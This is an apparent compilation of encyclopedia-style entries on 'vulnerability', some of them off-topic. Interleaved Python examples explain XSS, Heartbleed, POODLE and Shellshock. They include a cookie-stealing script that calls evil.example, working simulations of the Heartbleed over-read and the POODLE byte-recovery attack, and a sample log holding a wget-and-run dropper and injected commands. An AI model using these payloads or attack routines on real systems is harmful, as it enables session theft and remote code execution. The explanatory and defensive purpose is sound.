Vulnerability refers to the inability (of a system or a unit) to withstand the effects of a hostile environment. A window of vulnerability (WOV) is a time frame within which defensive measures are diminished, compromised or lacking.
The understanding of social and environmental vulnerability, as a methodological approach, involves the analysis of the risks and assets of disadvantaged groups, such as the elderly. Vulnerability as an approach carries great expectations for social policy and gerontological planning.
In relation to hazards and disasters, vulnerability is a concept that links the relationship that people have with their environment to social forces and institutions and the cultural values that sustain and contest them. “The concept of vulnerability expresses the multi-dimensionality of disasters by focusing attention on the totality of relationships in a given social situation which constitute a condition that, in combination with environmental forces, produces a disaster”.
It is also the extent to which changes could harm a system, or to which the community can be affected by the impact of a hazard or exposed to the possibility of being attacked or harmed, either physically or emotionally: "we were in a vulnerable position".
Within the body of literature related to vulnerability, major research streams include questions of methodology, such as: measuring and assessing vulnerability, including finding appropriate indicators for various aspects of vulnerability, up- and down-scaling methods, and participatory methods. Vulnerability research covers a complex, multidisciplinary field including development and poverty studies, public health, climate studies, security studies, engineering, geography, political ecology, and disaster risk management. This research is of importance and interest for organizations trying to reduce vulnerability, especially as related to poverty and other Millennium Development Goals. Many institutions are conducting interdisciplinary research on vulnerability. A forum that brings many of the current researchers on vulnerability together is the Expert Working Group (EWG). Researchers are currently working to refine definitions of "vulnerability", measurement and assessment methods, and effective communication of research to decision makers.
In its broadest sense, social vulnerability is one dimension of vulnerability to multiple stressors (agents responsible for stress) and shocks, including abuse, social exclusion and natural hazards. Social vulnerability refers to the inability of people, organizations, and societies to withstand adverse impacts from multiple stressors to which they are exposed. These impacts are due in part to characteristics inherent in social interactions, institutions, and systems of cultural values.
In this respect, there is a need to place an increased emphasis on assets and entitlements for understanding ‘catastrophe’ as opposed to solely the strength or severity of shocks.
A cognitive vulnerability, in cognitive psychology, is an erroneous belief, cognitive bias, or pattern of thought that is believed to predispose the individual to psychological problems. It is in place before the symptoms of a psychological disorder appear (high neuroticism is one example); once the individual encounters a stressful experience, the cognitive vulnerability shapes a maladaptive response that may lead to a psychological disorder. In psychopathology, cognitive vulnerability is constructed from schema models, hopelessness models, and attachment theory. Attentional bias is one mechanism leading to faulty cognitive bias, which in turn leads to cognitive vulnerability. The danger level assigned to a threat depends on the urgency or intensity of the threshold. Anxiety is not associated with selective orientation.
In military terminology, vulnerability is a subset of survivability, the others being susceptibility and recoverability. Vulnerability is defined in various ways depending on the nation and service arm concerned, but in general it refers to the near-instantaneous effects of a weapon attack. In aviation it is defined as the inability of an aircraft to withstand the damage caused by the man-made hostile environment. In some definitions, recoverability (damage control, firefighting, restoration of capability) is included in vulnerability. Some military services develop their own concept of vulnerability.
Invulnerability is a common feature found in science fiction and fantasy, in particular in superhero fiction, as depicted commonly in novels, comic books and video games. In such stories, it is a quality that makes a character impervious to pain, damage or loss of health.
In video games, it can be found in the form of "power-ups" or cheats; when activated via cheats, it is often referred to as "god mode". Generally, it does not protect the player from certain instant-death hazards, most notably "bottomless" pits from which, even if the player were to survive the fall, they would be unable to escape. As a rule, invulnerability granted by power-ups is temporary, and wears off after a set amount of time, while invulnerability cheats, once activated, remain in effect until deactivated, or the end of the level is reached. Depending on the game in question, invulnerability to damage may or may not protect the player from non-damage effects, such as being immobilized or sent flying.
In comic books, some superheroes are considered invulnerable, though this usually only applies up to a certain level (e.g. Superman is invulnerable to physical attacks from normal people but not to the extremely powerful attacks of Doomsday or those at his level or higher). In the manga, webcomic and anime series One-Punch Man, for example, the main protagonist Saitama is completely immune to all kinds of attacks, whether it be blunt attacks, environmental-based attacks (like heat or cold), slashing attacks or pressure-point based attacks, and unharmed by physical laws.
In mythology, talismans, charms, and amulets were created by magic users for the purpose of making the wearer immune to injury from both mystic and mundane weapons.
Application security encompasses measures taken to improve the security of an application often by finding, fixing and preventing security vulnerabilities.
Different techniques are used to surface such security vulnerabilities at different stages of an application's lifecycle, such as design, development, deployment, upgrade and maintenance.
An always evolving but largely consistent set of common security flaws is seen across different applications (see common flaws).
Cross-site scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007. As of 2017, XSS was still considered a major threat vector. XSS effects range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.
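The injection pattern described above, as an added example that is not part of this page or of any project it mentions: a comment renderer that interpolates untrusted text straight into HTML, the same renderer escaping for the HTML text context, and a link helper showing that escaping alone does not neutralise a javascript: URL inside an href, because escaping is context-specific. The comment payload, the function names and the link handling are all constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed attacker-supplied comment carrying a cookie-stealing payload.
ATTACKER_COMMENT = '<script>location="https://evil.example/?c="+document.cookie</script>'


def render_comment_unsafe(author, body):
    """Vulnerable: untrusted text is interpolated straight into the HTML body."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_safe(author, body):
    """Hardened: each untrusted value is escaped for the HTML text context, so
    '<' and '&' in it can no longer start a tag or an entity."""
    return (f'<div class="comment"><b>{html.escape(author)}</b>: '
            f'{html.escape(body)}</div>')


def safe_href(url):
    """Escaping is context-specific: html.escape() leaves 'javascript:alert(1)'
    perfectly valid inside href. Allow-list the scheme first, then escape for
    the quoted-attribute context."""
    if urlsplit(url.strip()).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_live_script(rendered):
    """Crude check for the demonstration: would a browser see a <script> tag?"""
    return _SCRIPT_TAG.search(rendered) is not None
```

The unsafe renderer returns the payload as a live tag; the safe one turns it into text. The href helper is the point practitioners most often miss: a value that is harmless in the text context can still be an attack in the URL context, so the output encoding has to match where the value lands.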
Disaster
A disaster is a serious disruption, occurring over a relatively short time, of the functioning of a community or a society involving widespread human, material, economic or environmental loss and impacts, which exceeds the ability of the affected community or society to cope using its own resources. In contemporary academia, disasters are seen as the consequence of inappropriately managed risk. These risks are the product of a combination of both hazards and vulnerability. Hazards that strike in areas with low vulnerability will never become disasters, as in the case of uninhabited regions. Developing countries suffer the greatest costs when a disaster hits: more than 95 percent of all deaths caused by hazards occur in developing countries, and losses due to natural hazards are 20 times greater (as a percentage of GDP) in developing countries than in industrialized countries.
Exploit (computer security)
An exploit (from the English verb to exploit, meaning "to use something to one's own advantage") is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized). Such behavior frequently includes things like gaining control of a computer system, allowing privilege escalation, or a denial-of-service (DoS or related DDoS) attack.
Foreshadow (security vulnerability)
Foreshadow (known as L1 Terminal Fault (L1TF) by Intel) is a vulnerability that affects modern microprocessors. It was first discovered by two independent teams of researchers in January 2018, but was first disclosed to the public on 14 August 2018. The vulnerability is a speculative execution attack on Intel processors that may result in the disclosure of sensitive information stored in personal computers and third-party clouds. There are two versions: the first version (original/Foreshadow) (CVE-2018-3615) targets data from SGX enclaves; the second version (next-generation/Foreshadow-NG) (CVE-2018-3620 and CVE-2018-3646) targets virtual machines (VMs), hypervisors (VMM), operating system (OS) kernel memory, and System Management Mode (SMM) memory. A listing of affected Intel hardware has been posted. Foreshadow is similar to the Spectre security vulnerabilities discovered earlier to affect Intel and AMD chips, and the Meltdown vulnerability that also affected Intel. However, AMD products, according to AMD, are not affected by the Foreshadow security flaws. According to one expert, "[Foreshadow] lets malicious software break into secure areas that even the Spectre and Meltdown flaws couldn't crack". Nonetheless, one of the variants of Foreshadow goes beyond Intel chips with SGX technology, and affects "all [Intel] Core processors built over the last seven years". Foreshadow may be very difficult to exploit, and there seems to be no evidence to date (15 August 2018) of any serious hacking involving the Foreshadow vulnerabilities. Nevertheless, applying software patches may help alleviate some concerns, although the balance between security and performance may be a worthy consideration. Companies performing cloud computing may see a significant decrease in their overall computing power; individuals, however, are unlikely to see any performance impact, according to researchers. The real fix, according to Intel, is replacing today's processors.
Intel further states, "These changes begin with our next-generation Intel Xeon Scalable processors (code-named Cascade Lake), as well as new client processors expected to launch later this year." On 16 August 2018, researchers presented technical details of the Foreshadow security vulnerabilities in a seminar, and publication, entitled "Foreshadow: Extracting the Keys to the Intel SGX Kingdom with Transient Out-of-Order Execution" at a USENIX security conference.
Full disclosure (computer security)
In the field of computer security, independent researchers often discover flaws in software that can be abused to cause unintended behaviour; these flaws are called vulnerabilities. The process by which the analysis of these vulnerabilities is shared with third parties is the subject of much debate, and is referred to as the researcher's disclosure policy. Full disclosure is the practice of publishing analysis of software vulnerabilities as early as possible, making the data accessible to everyone without restriction. The primary purpose of widely disseminating information about vulnerabilities is so that potential victims are as knowledgeable as those who attack them. In his essay on the topic, Bruce Schneier stated "Full disclosure – the practice of making the details of security vulnerabilities public – is a damned good idea. Public scrutiny is the only reliable way to improve security, while secrecy only makes us less secure". Leonard Rose, co-creator of an electronic mailing list that has superseded Bugtraq to become the de facto forum for disseminating advisories, explains "We don't believe in security by obscurity, and as far as we know, full disclosure is the only way to ensure that everyone, not just the insiders, have access to the information we need."
Heartbleed
Heartbleed is a security bug in the OpenSSL cryptography library, which is a widely used implementation of the Transport Layer Security (TLS) protocol. It was introduced into the software in 2012 and publicly disclosed in April 2014. Heartbleed may be exploited regardless of whether the vulnerable OpenSSL instance is running as a TLS server or client. It results from improper input validation (due to a missing bounds check) in the implementation of the TLS heartbeat extension. Thus, the bug's name derives from heartbeat. The vulnerability is classified as a buffer over-read, a situation where more data can be read than should be allowed. Heartbleed is registered in the Common Vulnerabilities and Exposures database as CVE-2014-0160. The federal Canadian Cyber Incident Response Centre issued a security bulletin advising system administrators about the bug. A fixed version of OpenSSL was released on April 7, 2014, on the same day Heartbleed was publicly disclosed. As of May 20, 2014, 1.5% of the 800,000 most popular TLS-enabled websites were still vulnerable to Heartbleed. TLS implementations other than OpenSSL, such as GnuTLS, Mozilla's Network Security Services, and the Windows platform implementation of TLS, were not affected because the defect existed in OpenSSL's implementation of TLS rather than in the protocol itself.
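An added model of the defect, not OpenSSL's own code: a heartbeat message (RFC 6520) is a type byte, a two-byte payload_length, the payload, and at least 16 bytes of padding, and the responder echoes payload_length bytes of payload. The pre-fix handler below trusts the sender's length and copies from a simulated memory buffer past the end of the record it actually received; the post-fix handler checks that header, payload and minimum padding all fit inside the record and silently drops the message otherwise, which is what the April 2014 fix does. The adjacent "secrets", the memory model and the function names are constructed for illustration.

```python
import struct

HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE = 1, 2
HEADER_LEN = 3        # type (1 byte) + payload_length (2 bytes)
MIN_PADDING = 16      # RFC 6520 requires at least 16 bytes of padding

# Constructed stand-in for whatever happened to sit next to the record on the
# heap: here a private-key fragment and a session cookie.
ADJACENT_SECRETS = (b"-----BEGIN RSA PRIVATE KEY-----\nMIIEpA...\n"
                    b"session=7f3a9c\n")


def build_heartbeat(payload, claimed_length=None):
    """Build a heartbeat request; claimed_length lets the sender lie about the
    payload size, which is the Heartbleed trigger."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HEARTBEAT_REQUEST, length) + payload + b"\x00" * MIN_PADDING


def _response(payload):
    return struct.pack("!BH", HEARTBEAT_RESPONSE, len(payload)) + payload + b"\x00" * MIN_PADDING


def handle_heartbeat_vulnerable(record, memory):
    """Pre-fix logic: copies payload_length bytes starting at the payload without
    checking that they lie inside the record. 'memory' models the process
    buffer: the record followed by unrelated data."""
    hb_type, payload_length = struct.unpack("!BH", record[:HEADER_LEN])
    if hb_type != HEARTBEAT_REQUEST:
        return b""
    payload = memory[HEADER_LEN:HEADER_LEN + payload_length]   # buffer over-read
    return _response(payload)


def handle_heartbeat_fixed(record, memory):
    """Post-fix logic: header, payload and minimum padding must all fit inside
    the bytes actually received; otherwise the message is silently discarded."""
    if len(record) < HEADER_LEN + MIN_PADDING:
        return b""
    hb_type, payload_length = struct.unpack("!BH", record[:HEADER_LEN])
    if hb_type != HEARTBEAT_REQUEST:
        return b""
    if HEADER_LEN + payload_length + MIN_PADDING > len(record):
        return b""                      # the bounds check that was missing
    return _response(record[HEADER_LEN:HEADER_LEN + payload_length])


def leaked_bytes(response, sent_payload):
    """Bytes echoed back that the sender never transmitted."""
    if not response:
        return b""
    (payload_length,) = struct.unpack("!H", response[1:HEADER_LEN])
    return response[HEADER_LEN:HEADER_LEN + payload_length][len(sent_payload):]


def demo():
    """Send 5 payload bytes but claim 60; returns (leak_before_fix, leak_after_fix)."""
    evil = build_heartbeat(b"hello", claimed_length=60)
    memory = evil + ADJACENT_SECRETS
    return (leaked_bytes(handle_heartbeat_vulnerable(evil, memory), b"hello"),
            leaked_bytes(handle_heartbeat_fixed(evil, memory), b"hello"))
```

A real attacker claims up to 65535 bytes per heartbeat and repeats the request, so each response is a fresh slice of whatever the process had in memory near the record buffer. The fixed handler's silent discard is deliberate: answering with an error would itself be a side channel.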
Internet Explorer
Internet Explorer (formerly Microsoft Internet Explorer and currently Windows Internet Explorer, commonly referred to as Explorer and abbreviated IE or MSIE) is a series of graphical web browsers (or, as of 2019, a "compatibility solution") developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. It was first released as part of the add-on package Plus! for Windows 95 that year. Later versions were available as free downloads, or in service packs, and included in the original equipment manufacturer (OEM) service releases of Windows 95 and later versions of Windows. The browser is discontinued, but still maintained. Internet Explorer was once the most widely used web browser, attaining a peak of about 95% usage share by 2003. This came after Microsoft used bundling to win the first browser war against Netscape, which was the dominant browser in the 1990s. Its usage share has since declined with the launch of Firefox (2004) and Google Chrome (2008), and with the growing popularity of operating systems such as Android and iOS that do not run Internet Explorer. Estimates for Internet Explorer's market share are about 2.58% across all platforms, or 7th by StatCounter's numbers, while on desktop, the only platform where it has ever had significant share (i.e., excluding mobile and Xbox), it is ranked 4th at 5.34%, just after macOS's Safari (others place IE 3rd with 4.79%, after Firefox), as of February 2019 (browser market share is notoriously difficult to calculate).
Microsoft spent over US$100 million per year on Internet Explorer in the late 1990s, with over 1,000 people involved in the project by 1999. Versions of Internet Explorer for other operating systems have also been produced, including an Xbox 360 version called Internet Explorer for Xbox and versions for platforms Microsoft no longer supports: Internet Explorer for Mac and Internet Explorer for UNIX (Solaris and HP-UX), and an embedded OEM version called Pocket Internet Explorer, later rebranded Internet Explorer Mobile, made for Windows Phone, Windows CE, and previously, based on Internet Explorer 7, for Windows Mobile.
On March 17, 2015, Microsoft announced that Microsoft Edge would replace Internet Explorer as the default browser on its Windows 10 devices (support for older Windows versions has since been announced; as of 2019 Edge's share was still below IE's declining share). This effectively makes Internet Explorer 11 the last release (IE 8, 9 and 10 also received security updates as of 2019). Internet Explorer, however, remains on Windows 10 and Windows Server 2019 primarily for enterprise purposes. Since January 12, 2016, only Internet Explorer 11 has been supported. Support varies based on the operating system's technical capabilities and its support lifecycle. The browser has been scrutinized throughout its development for use of third-party technology (such as the source code of Spyglass Mosaic, used without royalty in early versions) and security and privacy vulnerabilities, and the United States and the European Union have alleged that integration of Internet Explorer with Windows has been to the detriment of fair browser competition.
Macroeconomics
Macroeconomics (from the Greek prefix makro- meaning "large" + economics) is a branch of economics dealing with the performance, structure, behavior, and decision-making of an economy as a whole. This includes regional, national, and global economies. Macroeconomists study aggregated indicators such as GDP, unemployment rates, national income, price indices, and the interrelations among the different sectors of the economy to better understand how the whole economy functions. They also develop models that explain the relationship between such factors as national income, output, consumption, unemployment, inflation, saving, investment, international trade, and international finance.
While macroeconomics is a broad field of study, there are two areas of research that are emblematic of the discipline: the attempt to understand the causes and consequences of short-run fluctuations in national income (the business cycle), and the attempt to understand the determinants of long-run economic growth (increases in national income). Macroeconomic models and their forecasts are used by governments to assist in the development and evaluation of economic policy.
Macroeconomics and microeconomics, a pair of terms coined by Ragnar Frisch, are the two most general fields in economics. In contrast to macroeconomics, microeconomics is the branch of economics that studies the behavior of individuals and firms in making decisions and the interactions among these individuals and firms in narrowly-defined markets.
Meltdown (security vulnerability)
Meltdown is a hardware vulnerability affecting Intel x86 microprocessors, IBM POWER processors, and some ARM-based microprocessors. It allows a rogue process to read all memory, even when it is not authorized to do so.
Meltdown affects a wide range of systems. At the time of disclosure, this included all devices running any but the most recent and patched versions of iOS, Linux, macOS, or Windows. Accordingly, many servers and cloud services were impacted, as well as a potential majority of smart devices and embedded devices using ARM based processors (mobile devices, smart TVs, printers and others), including a wide range of networking equipment.
A purely software workaround to Meltdown has been assessed as slowing computers between 5 and 30 percent in certain specialized workloads, although companies responsible for software correction of the vulnerability are reporting minimal impact from general benchmark testing. Meltdown was issued a Common Vulnerabilities and Exposures ID of CVE-2017-5754, also known as Rogue Data Cache Load (RDCL), in January 2018. It was disclosed in conjunction with another exploit, Spectre, with which it shares some, but not all, characteristics. The Meltdown and Spectre vulnerabilities are considered "catastrophic" by security analysts. The vulnerabilities are so severe that, initially, security researchers believed the reports to be false. Several procedures to help protect home computers and related devices from the Meltdown and Spectre security vulnerabilities have been published. Meltdown patches may produce performance loss. Spectre patches have been reported to significantly reduce performance, especially on older computers; on the newer eighth-generation Core platforms, benchmark performance drops of 2–14 percent have been measured. On January 18, 2018, unwanted reboots, even for newer Intel chips, due to Meltdown and Spectre patches, were reported. Nonetheless, according to Dell: "No 'real-world' exploits of these vulnerabilities [i.e., Meltdown and Spectre] have been reported to date [January 26, 2018], though researchers have produced proof-of-concepts." Further, recommended preventions include: "promptly adopting software updates, avoiding unrecognized hyperlinks and websites, not downloading files or applications from unknown sources ... following secure password protocols ... [using] security software to help protect against malware (advanced threat prevention software or anti-virus)." On January 25, 2018, the current status and possible future considerations in solving the Meltdown and Spectre vulnerabilities were presented. On March 15, 2018, Intel reported that it will redesign its processors (performance losses to be determined) to help protect against Meltdown and the related Spectre vulnerabilities (especially Meltdown and Spectre-V2, but not Spectre-V1), and expects to release the newly redesigned processors later in 2018. On October 8, 2018, Intel was reported to have added hardware and firmware mitigations regarding the Spectre and Meltdown vulnerabilities to its latest processors.
OpenSSL
OpenSSL is a software library for applications that secure communications over computer networks against eavesdropping or need to identify the party at the other end. It is widely used in Internet web servers, serving a majority of all web sites.
OpenSSL contains an open-source implementation of the SSL and TLS protocols. The core library, written in the C programming language, implements basic cryptographic functions and provides various utility functions. Wrappers allowing the use of the OpenSSL library in a variety of computer languages are available.
The OpenSSL Software Foundation (OSF) represents the OpenSSL project in most legal capacities including contributor license agreements, managing donations, and so on. OpenSSL Software Services (OSS) also represents the OpenSSL project, for Support Contracts.
Versions are available for most Unix and Unix-like operating systems (including Solaris, Linux, macOS, QNX, and the various open-source BSD operating systems), OpenVMS and Microsoft Windows.
POODLE
The POODLE attack (which stands for "Padding Oracle On Downgraded Legacy Encryption") is a man-in-the-middle exploit which takes advantage of Internet and security software clients' fallback to SSL 3.0. If attackers successfully exploit this vulnerability, on average, they only need to make 256 SSL 3.0 requests to reveal one byte of encrypted messages. Bodo Möller, Thai Duong and Krzysztof Kotowicz from the Google Security Team discovered this vulnerability; they disclosed the vulnerability publicly on October 14, 2014 (despite the paper being dated "September 2014"). On December 8, 2014 a variation of the POODLE vulnerability that affected TLS was announced. The CVE-ID associated with the original POODLE attack is CVE-2014-3566.
F5 Networks filed for CVE-2014-8730 as well, covering the variant of the attack against TLS.
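An added simulation of the attack, not the researchers' code: an SSL 3.0-style record layer (MAC, then pad, then CBC-encrypt) whose decrypt path checks only the final padding-length byte, a toy Feistel block cipher standing in for the real cipher, and an attacker who, as in the paper, gets the client to resend a request whose last block is entirely padding, copies the ciphertext block holding the target byte into that last slot, and learns one plaintext byte each time the server accepts, which happens on about 1 try in 256. The same channel with tls_padding=True applies the TLS rule that every padding byte must equal the length byte, against which the substitution never succeeds. The cookie value, request layout, cipher and all helper names are constructed for illustration.

```python
import hashlib
import hmac
import random

BLOCK = 16
MAC_LEN = 20      # SSL 3.0 used a 20-byte MAC; truncated HMAC-SHA256 stands in for it
ROUNDS = 4
SECRET_COOKIE = b"S3cr3tC00k1e"                         # constructed target value
HEAD, MID, TAIL = b"POST /", b" HTTP/1.1\r\nCookie: s=", b"\r\n\r\n"


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, i, half):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def block_encrypt(key, blk):
    """Toy 16-byte Feistel cipher standing in for AES/3DES; only its
    invertibility matters for the attack, so this is NOT a real cipher."""
    l, r = blk[:8], blk[8:]
    for i in range(ROUNDS):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r


def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(ROUNDS)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r


def cbc_encrypt(key, iv, pt):
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out


class CbcChannel:
    """MAC-then-pad-then-encrypt record layer. tls_padding=False models SSL 3.0,
    which defines only the final length byte; True models the TLS rule that
    every padding byte must equal the length byte."""

    def __init__(self, rng, tls_padding=False):
        self.rng, self.tls_padding = rng, tls_padding
        self.enc_key, self.mac_key = self._rand(16), self._rand(16)

    def _rand(self, n):
        return bytes(self.rng.getrandbits(8) for _ in range(n))

    def _mac(self, data):
        return hmac.new(self.mac_key, data, hashlib.sha256).digest()[:MAC_LEN]

    def seal(self, data):
        body = data + self._mac(data)
        n = BLOCK - len(body) % BLOCK            # 1..16 padding bytes, always present
        filler = bytes([n - 1]) * (n - 1) if self.tls_padding else self._rand(n - 1)
        iv = self._rand(BLOCK)
        return iv + cbc_encrypt(self.enc_key, iv, body + filler + bytes([n - 1]))

    def open(self, record):
        """Decrypt and verify; None on any failure (the oracle the attacker observes)."""
        pt = cbc_decrypt(self.enc_key, record[:BLOCK], record[BLOCK:])
        pad = pt[-1]
        if pad + 1 > BLOCK or pad + 1 + MAC_LEN > len(pt):
            return None
        if self.tls_padding and any(b != pad for b in pt[-(pad + 1):]):
            return None
        body = pt[:-(pad + 1)]
        data, tag = body[:-MAC_LEN], body[-MAC_LEN:]
        return data if hmac.compare_digest(tag, self._mac(data)) else None


def request(prefix_len, body_len):
    """The request the victim's browser sends: attacker-run script chooses the
    path and body lengths, the browser attaches the cookie."""
    return HEAD + b"a" * prefix_len + MID + SECRET_COOKIE + TAIL + b"b" * body_len


def layout(k):
    """Lengths that put cookie byte k last in some plaintext block and make the
    record end with a full block of padding; returns (prefix, body, block index)."""
    for p in range(BLOCK, 2 * BLOCK):
        pos = len(HEAD) + p + len(MID) + k
        if pos % BLOCK == BLOCK - 1:
            total = len(HEAD) + p + len(MID) + len(SECRET_COOKIE) + len(TAIL) + MAC_LEN
            q = next(q for q in range(BLOCK, 2 * BLOCK) if (total + q) % BLOCK == 0)
            return p, q, pos // BLOCK


def recover_cookie(chan, max_tries=100000):
    """POODLE: move the block holding the target byte into the padding slot and
    wait for the 1-in-256 acceptance; returns (cookie, tries) or (None, tries)."""
    found, tries = bytearray(), 0
    for k in range(len(SECRET_COOKIE)):
        p, q, i = layout(k)
        while True:
            tries += 1
            if tries > max_tries:
                return None, tries
            rec = chan.seal(request(p, q))
            blocks = [rec[j:j + BLOCK] for j in range(0, len(rec), BLOCK)]  # blocks[0] is the IV
            forged = b"".join(blocks[:-1] + [blocks[i + 1]])
            if chan.open(forged) is not None:
                # last block decrypted to P_i ^ C_(i-1) ^ C_(n-1) and its final byte was 15
                found.append((BLOCK - 1) ^ blocks[i][-1] ^ blocks[-2][-1])
                break
    return bytes(found), tries
```

When the forged last block happens to decrypt with final byte 15, the server strips a whole block, what remains is exactly data plus MAC, and the MAC verifies; nothing else about the padding was checked, which is the oracle. The try count printed by recover_cookie lands near 256 per byte, matching the figure quoted above.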
Secure Shell
Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network. Typical applications include remote command-line login and remote command execution, but any network service can be secured with SSH.
SSH provides a secure channel over an unsecured network in a client–server architecture, connecting an SSH client application with an SSH server. The protocol specification distinguishes between two major versions, referred to as SSH-1 and SSH-2. The standard TCP port for SSH is 22. SSH is generally used to access Unix-like operating systems, but it can also be used on Microsoft Windows. Windows 10 uses OpenSSH as its default SSH client. SSH was designed as a replacement for Telnet and for unsecured remote shell protocols such as the Berkeley rlogin, rsh, and rexec protocols. Those protocols send information, notably passwords, in plaintext, rendering them susceptible to interception and disclosure using packet analysis. The encryption used by SSH is intended to provide confidentiality and integrity of data over an unsecured network, such as the Internet, although files leaked by Edward Snowden indicate that the National Security Agency can sometimes decrypt SSH, allowing them to read the contents of SSH sessions.
Shellshock (software bug)
Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests.
On 12 September 2014, Stéphane Chazelas informed Bash's maintainer Chet Ramey of his discovery of the original bug, which he called "Bashdoor". Working with security experts, he developed a patch (fix), and the bug was assigned the identifier CVE-2014-6271. The existence of the bug was announced to the public on 24 September 2014, when Bash updates with the fix were ready for distribution. The bug Chazelas discovered caused Bash to unintentionally execute commands when they are concatenated to the end of function definitions stored in the values of environment variables. Within days of its publication a variety of related vulnerabilities were discovered (CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186 and CVE-2014-7187). Ramey addressed these with a series of further patches. Attackers exploited Shellshock within hours of the initial disclosure by creating botnets of compromised computers to perform distributed denial-of-service attacks and vulnerability scanning. Security companies recorded millions of attacks and probes related to the bug in the days following the disclosure. Because of the potential to compromise millions of unpatched systems, Shellshock was compared to the Heartbleed bug in its severity.
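An added example, not code from the Bash project or from anyone cited above, of the checks a practitioner wanted in the days after disclosure: recognising the exported-function form that triggers the bug in an attacker-controlled value, scanning web server log lines for it in the header fields that CGI copies into environment variables (where a Bash CGI script inherits them), and the widely circulated one-line test of the local bash for CVE-2014-6271. The log lines, addresses and function names are constructed.

```python
import re
import shutil
import subprocess

# Bash before the fix imported any environment variable whose value began with
# "() {" as a function definition and kept parsing past the closing brace, so
# text after "};" was executed as a command when the shell started.
_SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{.*?\}\s*;\s*(?P<trailer>.+)$", re.DOTALL)


def shellshock_trailer(value):
    """Return the command a vulnerable Bash would run for this env-var value,
    or None if the value is not a Shellshock-style function definition."""
    m = _SHELLSHOCK_RE.match(value)
    return m.group("trailer").strip() if m else None


# Constructed Apache combined-format lines; the 3rd and 4th carry probes in the
# User-Agent and Referer headers (CGI exposes them as HTTP_USER_AGENT and
# HTTP_REFERER, so a Bash CGI script inherits the payload).
SAMPLE_LOG = """\
203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2014:10:01:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 88 "-" "curl/7.37.0"
198.51.100.9 - - [25/Sep/2014:10:02:10 +0000] "GET /cgi-bin/status HTTP/1.1" 200 88 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.9/x -O /tmp/x; sh /tmp/x'"
198.51.100.9 - - [25/Sep/2014:10:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 88 "() { test;}; /usr/bin/id" "Mozilla/5.0"
"""

_LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
                     r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')


def scan_log(text):
    """Return (client ip, field, command) for every request whose quoted fields
    carry a Shellshock payload."""
    hits = []
    for line in text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        for field in ("request", "referer", "ua"):
            cmd = shellshock_trailer(m.group(field))
            if cmd:
                hits.append((m.group("ip"), field, cmd))
    return hits


def local_bash_vulnerable():
    """The well-known CVE-2014-6271 check: True if the local bash runs the
    trailing command, False if patched, None if bash is not installed."""
    bash = shutil.which("bash")
    if bash is None:
        return None
    out = subprocess.run([bash, "-c", "echo test"], env={"x": "() { :;}; echo vulnerable"},
                         capture_output=True, text=True)
    return "vulnerable" in out.stdout
```

The scanner keys on the function-definition prefix rather than on any particular payload, so it catches the wget droppers seen in the first hours as well as the `/usr/bin/id` probes scanners used to confirm a target. The local check exercises only the original bug; the later CVEs listed above needed their own tests.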
Social vulnerability
In its broadest sense, social vulnerability is one dimension of vulnerability to multiple stressors and shocks, including abuse, social exclusion and natural hazards. Social vulnerability refers to the inability of people, organizations, and societies to withstand adverse impacts from multiple stressors to which they are exposed. These impacts are due in part to characteristics inherent in social interactions, institutions, and systems of cultural values.
Because it is most apparent when calamity occurs, many studies of social vulnerability are found in risk management literature.
Spectre (security vulnerability)
Spectre is a vulnerability that affects modern microprocessors that perform branch prediction.
In computer security, a vulnerability is a weakness which can be exploited by a threat actor, such as an attacker, to perform unauthorized actions within a computer system.
To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can reach the system weakness. The set of points through which an attacker can reach a system's weaknesses is its attack surface; the two terms are sometimes conflated.
Vulnerability management is the cyclical practice of identifying, classifying, remediating, and mitigating vulnerabilities. This practice generally refers to software vulnerabilities in computing systems.
